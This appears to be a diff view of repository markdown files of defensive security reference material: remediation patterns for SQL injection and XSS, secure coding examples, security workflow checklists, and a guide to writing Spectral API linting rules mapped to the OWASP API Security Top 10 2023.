- **CWE-532**: Information Exposure Through Log Files
**Usage**: Include CWE identifier in all vulnerability reports for standardized classification.
### MITRE ATT&CK
Reference relevant tactics and techniques for threat context:
#### Initial Access (TA0001)
- **T1190**: Exploit Public-Facing Application
- **T1133**: External Remote Services
- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
```html
<!-- Set via HTTP response header (preferred): -->
<!-- Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}' -->
<!-- Or as a meta tag (supports a subset of directives): -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'">
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
raise ValueError("API_KEY environment variable not set")
def require_api_key(f):
@wraps(f)
def decorated_function(*args, **kwargs):
api_key = request.headers.get('X-API-Key')
if not api_key:
return jsonify({'error': 'API key required'}), 401
# Constant-time comparison to prevent timing attacks
import hmac
if not hmac.compare_digest(api_key, VALID_API_KEY):
return jsonify({'error': 'Invalid API key'}), 403
return f(*args, **kwargs)
return decorated_function
@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
"""Hash a password using bcrypt."""
# Generate salt and hash password
salt = bcrypt.gensalt(rounds=12) # Cost factor: 12 (industry standard)
hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
return hashed.decode('utf-8')
def verify_password(password: str, hashed: str) -> bool:
"""Verify a password against a hash."""
return bcrypt.checkpw(
password.encode('utf-8'),
hashed.encode('utf-8')
)
# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash) # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import uuid
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
"""Validate file extension and MIME type."""
# Check extension
if '.' not in filename:
return False
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
return False
# Check MIME type (prevent extension spoofing)
mime = magic.from_buffer(file_content, mime=True)
if mime not in ALLOWED_MIME_TYPES:
return False
return True
def handle_upload(file):
"""Securely handle file upload."""
# Check file size
file.seek(0, os.SEEK_END)
size = file.tell()
file.seek(0)
if size > MAX_FILE_SIZE:
raise ValueError("File too large")
# Read content for validation
content = file.read()
file.seek(0)
# Validate file type
if not is_allowed_file(file.filename, content):
raise ValueError("Invalid file type")
# Sanitize filename
filename = secure_filename(file.filename)
# Generate unique filename to prevent overwrite attacks
unique_filename = f"{uuid.uuid4()}_{filename}"
# Save to secure location (outside web root)
upload_path = os.path.join('/secure/uploads', unique_filename)
file.save(upload_path)
return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence

View File

@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using a CVSS calculator (a scoring sketch follows this workflow)
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
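A minimal sketch of the severity-to-priority mapping used in step 2 (the thresholds mirror the list above):
```python
def cvss_priority(score: float) -> tuple[str, str]:
    """Map a CVSS base score to a remediation priority and action window."""
    if score >= 9.0:
        return "Critical", "immediate action"
    if score >= 7.0:
        return "High", "action within 24h"
    if score >= 4.0:
        return "Medium", "action within 1 week"
    return "Low", "action within 30 days"

print(cvss_priority(8.1))  # ('High', 'action within 24h')
```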
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml` (a sketch of such a validator follows this workflow)
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
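The referenced `scripts/validate_config.py` stands in for whatever validator fits your tool; a minimal sketch (the required and recommended keys here are illustrative, not a real schema):
```python
#!/usr/bin/env python3
"""Hypothetical config validator: prints errors/warnings, exits non-zero on errors."""
import sys
import yaml

REQUIRED_KEYS = {"severity_threshold", "rules"}           # missing -> error
RECOMMENDED_KEYS = {"exclude_patterns", "output_format"}  # missing -> warning

def validate(path: str) -> int:
    with open(path) as f:
        cfg = yaml.safe_load(f) or {}
    errors = [f"missing required key: {key}" for key in REQUIRED_KEYS - cfg.keys()]
    warnings = [f"missing recommended key: {key}" for key in RECOMMENDED_KEYS - cfg.keys()]
    for message in errors:
        print(f"ERROR: {message}")
    for message in warnings:
        print(f"WARNING: {message}")
    return 1 if errors else 0

if __name__ == "__main__":
    sys.exit(validate(sys.argv[1]))
```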
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,553 @@
# Spectral Custom Rules Development Guide
This guide covers creating custom security rules for Spectral to enforce organization-specific API security standards.
## Table of Contents
- [Rule Structure](#rule-structure)
- [JSONPath Expressions](#jsonpath-expressions)
- [Built-in Functions](#built-in-functions)
- [Security Rule Examples](#security-rule-examples)
- [Testing Custom Rules](#testing-custom-rules)
- [Best Practices](#best-practices)
## Rule Structure
Every Spectral rule consists of:
```yaml
rules:
rule-name:
description: Human-readable description
severity: error|warn|info|hint
given: JSONPath expression targeting specific parts of spec
then:
- field: property to check (optional)
function: validation function
functionOptions: function-specific options
message: Error message shown when rule fails
```
### Severity Levels
- **error**: Critical security issues that must be fixed
- **warn**: Important security recommendations
- **info**: Best practices and suggestions
- **hint**: Style guide and documentation improvements
## JSONPath Expressions
### Basic Path Selection
```yaml
# Target all paths
given: $.paths[*]
# Target all GET operations
given: $.paths[*].get
# Target all HTTP methods
given: $.paths[*][get,post,put,patch,delete]
# Target security schemes
given: $.components.securitySchemes[*]
# Target all schemas
given: $.components.schemas[*]
```
### Advanced Filters
```yaml
# Filter by property value
given: $.paths[*][?(@.security)]
# Filter objects by type
given: $.components.schemas[?(@.type == 'object')]
# Filter parameters by location
given: $.paths[*][*].parameters[?(@.in == 'query')]
# Regular expression matching
given: $.paths[*][*].parameters[?(@.name =~ /^(id|.*_id)$/i)]
# Nested property access
given: $.paths[*][*].responses[?(@property >= 400)]
```
## Built-in Functions
### truthy / falsy
Check if field exists or doesn't exist:
```yaml
# Require field to exist
then:
- field: security
function: truthy
# Require field to not exist
then:
- field: additionalProperties
function: falsy
```
### pattern
Match string against regex pattern:
```yaml
# Match HTTPS URLs
then:
function: pattern
functionOptions:
match: "^https://"
# Ensure no sensitive terms
then:
function: pattern
functionOptions:
notMatch: "(password|secret|api[_-]?key)"
```
### enumeration
Restrict to specific values:
```yaml
# Require specific auth types
then:
field: type
function: enumeration
functionOptions:
values: [apiKey, oauth2, openIdConnect]
```
### length
Validate string/array length:
```yaml
# Minimum description length
then:
field: description
function: length
functionOptions:
min: 10
max: 500
```
### schema
Validate against JSON Schema:
```yaml
# Require specific object structure
then:
function: schema
functionOptions:
schema:
type: object
required: [error, message]
properties:
error:
type: string
message:
type: string
```
### alphabetical
Ensure alphabetical ordering:
```yaml
# Require alphabetically sorted tags
then:
field: tags
function: alphabetical
```
## Security Rule Examples
### Prevent PII in URL Parameters
```yaml
no-pii-in-query-params:
description: Query parameters must not contain PII
severity: error
given: $.paths[*][*].parameters[?(@.in == 'query')].name
then:
function: pattern
functionOptions:
notMatch: "(?i)(ssn|social.?security|credit.?card|password|passport|driver.?license|tax.?id|national.?id)"
message: "Query parameter names suggest PII - use request body instead"
```
### Require API Key for Authentication
```yaml
require-api-key-security:
description: APIs must use API key authentication
severity: error
given: $.components.securitySchemes
then:
function: schema
functionOptions:
schema:
type: object
minProperties: 1
patternProperties:
".*":
anyOf:
- properties:
type:
const: apiKey
- properties:
type:
const: oauth2
- properties:
type:
const: openIdConnect
message: "API must define apiKey, OAuth2, or OpenID Connect security"
```
### Enforce Rate Limiting Headers
```yaml
rate-limit-headers-present:
description: Responses should include rate limit headers
severity: warn
given: $.paths[*][get,post,put,patch,delete].responses[?(@property == '200' || @property == '201')].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-RateLimit-Limit]
- required: [X-Rate-Limit-Limit]
message: "Include rate limit headers (X-RateLimit-Limit, X-RateLimit-Remaining) in success responses"
```
### Detect Missing Authorization for Sensitive Operations
```yaml
sensitive-operations-require-security:
description: Sensitive operations must have security requirements
severity: error
given: $.paths[*][post,put,patch,delete]
then:
- field: security
function: truthy
message: "Write operations must have security requirements defined"
```
### Prevent Verbose Error Messages
```yaml
no-verbose-error-responses:
description: Error responses should not expose internal details
severity: warn
given: $.paths[*][*].responses[?(@property >= 500)].content.application/json.schema.properties
then:
function: schema
functionOptions:
schema:
type: object
not:
anyOf:
- required: [stack_trace]
- required: [stackTrace]
- required: [debug_info]
- required: [internal_message]
message: "5xx error responses should not expose stack traces or internal details"
```
### Require Audit Fields in Schemas
```yaml
require-audit-fields:
description: Data models should include audit fields
severity: info
given: $.components.schemas[?(@.type == 'object' && @.properties)]
then:
function: schema
functionOptions:
schema:
type: object
properties:
properties:
type: object
anyOf:
- required: [created_at, updated_at]
- required: [createdAt, updatedAt]
message: "Consider adding audit fields (created_at, updated_at) to data models"
```
### Detect Insecure Content Types
```yaml
no-insecure-content-types:
description: Avoid insecure content types
severity: warn
given: $.paths[*][*].requestBody.content
then:
function: schema
functionOptions:
schema:
type: object
not:
anyOf:
- required: [text/html]
- required: [text/xml]
- required: [application/x-www-form-urlencoded]
message: "Prefer application/json over HTML, XML, or form-encoded content types"
```
### Validate JWT Security Configuration
```yaml
jwt-proper-configuration:
description: JWT bearer authentication should be properly configured
severity: error
given: $.components.securitySchemes[?(@.type == 'http' && @.scheme == 'bearer')]
then:
- field: bearerFormat
function: pattern
functionOptions:
match: "^JWT$"
message: "Bearer authentication should specify 'JWT' as bearerFormat"
```
### Require CORS Documentation
```yaml
cors-options-documented:
description: CORS preflight endpoints should be documented
severity: warn
given: $.paths[*]
then:
function: schema
functionOptions:
schema:
type: object
if:
properties:
get:
type: object
then:
properties:
options:
type: object
required: [responses]
message: "Document OPTIONS method for CORS preflight requests"
```
### Prevent Numeric IDs in URLs
```yaml
prefer-uuid-over-numeric-ids:
description: Use UUIDs instead of numeric IDs to prevent enumeration
severity: info
given: $.paths.*~
then:
function: pattern
functionOptions:
notMatch: "\\{id\\}|\\{.*_id\\}"
message: "Consider using UUIDs instead of numeric IDs to prevent enumeration attacks"
```
## Testing Custom Rules
### Create Test Specifications
```yaml
# test-specs/valid-auth.yaml
openapi: 3.0.0
info:
title: Valid API
version: 1.0.0
components:
securitySchemes:
apiKey:
type: apiKey
in: header
name: X-API-Key
security:
- apiKey: []
```
```yaml
# test-specs/invalid-auth.yaml
openapi: 3.0.0
info:
title: Invalid API
version: 1.0.0
components:
securitySchemes:
basicAuth:
type: http
scheme: basic
security:
- basicAuth: []
```
### Test Rules
```bash
# Test custom ruleset
spectral lint test-specs/valid-auth.yaml --ruleset .spectral-custom.yaml
# Expected: No errors
spectral lint test-specs/invalid-auth.yaml --ruleset .spectral-custom.yaml
# Expected: Error about HTTP Basic auth
```
### Automated Testing Script
```bash
#!/bin/bash
# test-rules.sh - Test custom Spectral rules
RULESET=".spectral-custom.yaml"
TEST_DIR="test-specs"
PASS=0
FAIL=0
for spec in "$TEST_DIR"/*.yaml; do
echo "Testing: $spec"
if spectral lint "$spec" --ruleset "$RULESET" > /dev/null 2>&1; then
if [[ "$spec" == *"valid"* ]]; then
echo " ✓ PASS (correctly validated)"
((PASS++))
else
echo " ✗ FAIL (should have detected issues)"
((FAIL++))
fi
else
if [[ "$spec" == *"invalid"* ]]; then
echo " ✓ PASS (correctly detected issues)"
((PASS++))
else
echo " ✗ FAIL (false positive)"
((FAIL++))
fi
fi
done
echo ""
echo "Results: $PASS passed, $FAIL failed"
```
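The same loop can be driven from Python when structured results are needed, for example in CI. A sketch that assumes `spectral` is on PATH and uses its JSON output format, where severity 0 denotes an error:
```python
import json
import subprocess
from pathlib import Path

def lint(spec: Path, ruleset: str = ".spectral-custom.yaml") -> list[dict]:
    """Run Spectral on one spec and return its JSON findings."""
    proc = subprocess.run(
        ["spectral", "lint", str(spec), "--ruleset", ruleset, "--format", "json"],
        capture_output=True, text=True,
    )
    return json.loads(proc.stdout or "[]")

for spec in sorted(Path("test-specs").glob("*.yaml")):
    findings = lint(spec)
    errors = [f for f in findings if f.get("severity") == 0]  # 0 = error
    print(f"{spec}: {len(findings)} findings, {len(errors)} errors")
```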
## Best Practices
### 1. Start with Built-in Rules
Extend existing rulesets instead of starting from scratch:
```yaml
extends: ["spectral:oas", "spectral:asyncapi"]
rules:
# Add custom rules here
custom-security-rule:
# ...
```
### 2. Use Descriptive Names
Rule names should clearly indicate what they check:
```yaml
# Good
no-pii-in-query-params:
require-https-servers:
jwt-bearer-format-required:
# Bad
check-params:
security-rule-1:
validate-auth:
```
### 3. Provide Actionable Messages
```yaml
# Good
message: "Query parameters must not contain PII (ssn, credit_card) - use request body instead"
# Bad
message: "Invalid parameter"
```
### 4. Choose Appropriate Severity
```yaml
# error - Must fix (security vulnerabilities)
severity: error
# warn - Should fix (security best practices)
severity: warn
# info - Consider fixing (recommendations)
severity: info
# hint - Nice to have (style guide)
severity: hint
```
### 5. Document Rule Rationale
```yaml
rules:
no-numeric-ids:
description: |
Use UUIDs instead of auto-incrementing numeric IDs in URLs to prevent
enumeration attacks where attackers can guess valid IDs sequentially.
This follows OWASP API Security best practices for API1:2023.
severity: warn
# ...
```
### 6. Use Rule Overrides for Exceptions
```yaml
# Allow specific paths to violate rules
overrides:
- files: ["**/internal-api.yaml"]
rules:
require-https-servers: off
- files: ["**/admin-api.yaml"]
rules:
no-http-basic-auth: warn # Downgrade to warning
```
### 7. Organize Rules by Category
```yaml
# .spectral.yaml - Main ruleset
extends:
- .spectral-auth.yaml # Authentication rules
- .spectral-authz.yaml # Authorization rules
- .spectral-data.yaml # Data protection rules
- .spectral-owasp.yaml # OWASP mappings
```
### 8. Version Control Your Rulesets
```bash
# Track ruleset evolution
git log -p .spectral.yaml
# Tag stable ruleset versions
git tag -a ruleset-v1.0 -m "Production-ready security ruleset"
```
## Additional Resources
- [Spectral Rulesets Documentation](https://docs.stoplight.io/docs/spectral/docs/getting-started/rulesets.md)
- [JSONPath Online Evaluator](https://jsonpath.com/)
- [Custom Functions Guide](./custom_functions.md)
- [OWASP API Security Mappings](./owasp_api_mappings.md)

View File

@@ -0,0 +1,472 @@
# OWASP API Security Top 10 2023 - Spectral Rule Mappings
This reference provides comprehensive Spectral rule mappings to OWASP API Security Top 10 2023, including custom rule examples for detecting each category of vulnerability.
## Table of Contents
- [API1:2023 - Broken Object Level Authorization](#api12023---broken-object-level-authorization)
- [API2:2023 - Broken Authentication](#api22023---broken-authentication)
- [API3:2023 - Broken Object Property Level Authorization](#api32023---broken-object-property-level-authorization)
- [API4:2023 - Unrestricted Resource Consumption](#api42023---unrestricted-resource-consumption)
- [API5:2023 - Broken Function Level Authorization](#api52023---broken-function-level-authorization)
- [API6:2023 - Unrestricted Access to Sensitive Business Flows](#api62023---unrestricted-access-to-sensitive-business-flows)
- [API7:2023 - Server Side Request Forgery](#api72023---server-side-request-forgery)
- [API8:2023 - Security Misconfiguration](#api82023---security-misconfiguration)
- [API9:2023 - Improper Inventory Management](#api92023---improper-inventory-management)
- [API10:2023 - Unsafe Consumption of APIs](#api102023---unsafe-consumption-of-apis)
---
## API1:2023 - Broken Object Level Authorization
**Description**: APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an input from the user.
### Spectral Rules
```yaml
# .spectral-api1.yaml
rules:
# Require security on all operations
operation-security-defined:
description: All operations must have security requirements (OWASP API1)
severity: error
given: $.paths[*][get,post,put,patch,delete]
then:
- field: security
function: truthy
message: "Operations must define security requirements to prevent unauthorized object access (OWASP API1:2023)"
# Detect ID parameters without authorization checks
id-parameter-requires-security:
description: Flag ID parameters so object-level authorization can be verified
severity: error
given: $.paths[*][*].parameters[?(@.name =~ /^(id|.*[_-]id)$/i)]
then:
function: falsy
message: "Path contains ID parameter - ensure operation has security requirements (OWASP API1:2023)"
# Require authorization scopes for CRUD operations
crud-requires-authorization-scope:
description: CRUD operations should specify authorization scopes
severity: warn
given: $.paths[*][get,post,put,patch,delete].security[*]
then:
function: schema
functionOptions:
schema:
type: object
minProperties: 1
message: "CRUD operations should specify authorization scopes (OWASP API1:2023)"
```
### Remediation
- Implement object-level authorization checks in API specification security requirements
- Define per-operation security schemes with appropriate scopes
- Document which user roles can access which objects
- Consider using OAuth 2.0 with fine-grained scopes
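These rules can only verify that the specification declares security requirements; the object-level check itself lives in application code. A minimal server-side sketch (assuming Flask; the data store and the way `g.current_user_id` is populated are illustrative):
```python
from flask import Flask, abort, g, jsonify

app = Flask(__name__)

ORDERS = {42: {"id": 42, "owner_id": 7, "total": 19.99}}  # illustrative data store

@app.route("/orders/<int:order_id>")
def get_order(order_id: int):
    order = ORDERS.get(order_id)
    if order is None:
        abort(404)
    # Object-level authorization: the authenticated user must own the object.
    # g.current_user_id is assumed to be set by authentication middleware.
    if order["owner_id"] != g.current_user_id:
        abort(403)
    return jsonify(order)
```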
---
## API2:2023 - Broken Authentication
**Description**: Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or exploit implementation flaws to assume other users' identities.
### Spectral Rules
```yaml
# .spectral-api2.yaml
rules:
# Require security schemes definition
security-schemes-required:
description: API must define security schemes (OWASP API2)
severity: error
given: $.components
then:
- field: securitySchemes
function: truthy
message: "API must define security schemes to prevent authentication bypass (OWASP API2:2023)"
# Prohibit HTTP Basic authentication
no-http-basic-auth:
description: HTTP Basic auth is insecure for APIs
severity: error
given: $.components.securitySchemes[*]
then:
- field: scheme
function: pattern
functionOptions:
notMatch: "^basic$"
message: "HTTP Basic authentication transmits credentials in plain text (OWASP API2:2023)"
# Require bearer token format specification
bearer-format-required:
description: Bearer authentication should specify token format (JWT recommended)
severity: warn
given: $.components.securitySchemes[?(@.type == 'http' && @.scheme == 'bearer')]
then:
- field: bearerFormat
function: truthy
message: "Bearer authentication should specify token format, preferably JWT (OWASP API2:2023)"
# Require OAuth2 flow for authentication
oauth2-recommended:
description: OAuth2 provides secure authentication flows
severity: info
given: $.components.securitySchemes[*]
then:
- field: type
function: enumeration
functionOptions:
values: [oauth2, openIdConnect, http]
message: "Consider using OAuth2 or OpenID Connect for robust authentication (OWASP API2:2023)"
```
### Remediation
- Use OAuth 2.0 or OpenID Connect for authentication
- Implement JWT with proper expiration and signature validation
- Avoid HTTP Basic authentication for production APIs
- Document authentication flows and token refresh mechanisms
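On the implementation side, a minimal sketch of validating a JWT's signature and expiration (assuming the PyJWT library and an HS256 shared secret; key management and issuer/audience checks are out of scope here):
```python
import jwt  # PyJWT

SECRET = "load-from-a-secret-store"  # illustrative; never hardcode secrets

def verify_token(token: str) -> dict:
    """Return the token's claims if valid; raise jwt.InvalidTokenError otherwise."""
    return jwt.decode(
        token,
        SECRET,
        algorithms=["HS256"],          # pin the algorithm; never accept "none"
        options={"require": ["exp"]},  # reject tokens without an expiration claim
    )
```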
---
## API3:2023 - Broken Object Property Level Authorization
**Description**: This category combines API3:2019 Excessive Data Exposure and API6:2019 Mass Assignment, focusing on the root cause: the lack of or improper authorization validation at the object property level.
### Spectral Rules
```yaml
# .spectral-api3.yaml
rules:
# Prohibit additionalProperties for security
no-additional-properties:
description: Prevent mass assignment by disabling additionalProperties
severity: warn
given: $.components.schemas[*]
then:
- field: additionalProperties
function: falsy
message: "Set additionalProperties to false to prevent mass assignment vulnerabilities (OWASP API3:2023)"
# Require explicit property definitions
schema-properties-required:
description: Schemas should explicitly define all properties
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
- field: properties
function: truthy
